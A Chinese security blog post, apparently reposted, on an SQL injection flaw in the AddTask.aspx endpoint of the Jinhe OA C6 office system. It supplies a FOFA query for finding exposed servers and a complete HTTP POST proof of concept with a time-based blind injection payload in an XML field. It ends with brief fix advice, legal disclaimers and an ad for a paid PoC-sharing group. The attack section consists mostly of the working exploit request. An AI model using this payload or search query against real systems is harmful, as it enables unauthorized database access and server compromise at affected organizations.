文章总结： 本文详细分析了金和OAC6系统AddTask.aspx接口存在的SQL注入漏洞，攻击者可通过构造恶意Payload获取数据库敏感信息或服务器权限。文档提供了完整的漏洞复现步骤、FOFA搜索语法、PoC利用代码及nuclei检测脚本，并给出关闭互联网暴露面和升级版本的修复建议。文章同时强调仅供合法安全测试使用，并附带了内部漏洞圈的推广信息。 综合评分： 72 文章分类： 漏洞分析,WEB安全,渗透测试,解决方案,漏洞预警

金和OA-AddTask-sql注入漏洞

原创

北雪网络安全 北雪网络安全

北雪网络安全

2026年4月30日 09:09 山东

在小说阅读器读本章

去阅读

本文章所描述的内容仅供网络安全学习使用，任何人不允许学到技术内容进行非法系统测试，作者不对任何学习文章并进行非法操作的行为负责，由本人自己承担后果，本文章仅供技术学习。

01

更多内容

网络安全学习知识库每日添加最新漏洞并提供python与 nuclei 批量探测脚本：https://pc.fenchuan8.com/#/index?forum=110296

02

搜索引擎

FOFA：app=”金和网络-金和OA”

03

漏洞复现

漏洞概述：金和OA C6 AddTask.aspx接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

POST /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx/ HTTP/1.1Host: your-ipUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/103.0.5060.66 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Content-Type: application/xml
<root>&nbsp;<Page>&nbsp;&nbsp;<PageName>TaskDetect</PageName>&nbsp;</Page>&nbsp;<StartTime>2025-06-06&nbsp;00:00:00</StartTime>&nbsp;<EndTime>2025-06-06&nbsp;00:00:00</EndTime>&nbsp;<TaskExecutorID>3');WAITFOR DELAY'0:0:5'-- </TaskExecutorID></root>

04

自查工具

05

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

06

内部圈子

🛠️ 【知名漏洞实战圈，纯干货】🛠️

还在找公开漏洞POC而烦恼？还在为漏洞不会验证而发愁？还在为发现不了漏洞而自卑？这里漏洞圈子解决你的困惑！ 目前已更新poc数量2500+

🎯 适用场景

▫️渗透测试▫️企业漏洞自查▫️攻防演练▫️安全服务▫️合规运营****

⚠️ 重要声明：

▫️仅限合法授权测试，严禁违规使用

▫️虚拟资源服务，购买后不接受任何形式退款

        ▫️付款前请评估需求，慎重考虑

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北雪网络安全 北雪网络安全 北雪网络安全《金和OA-AddTask-sql注入漏洞》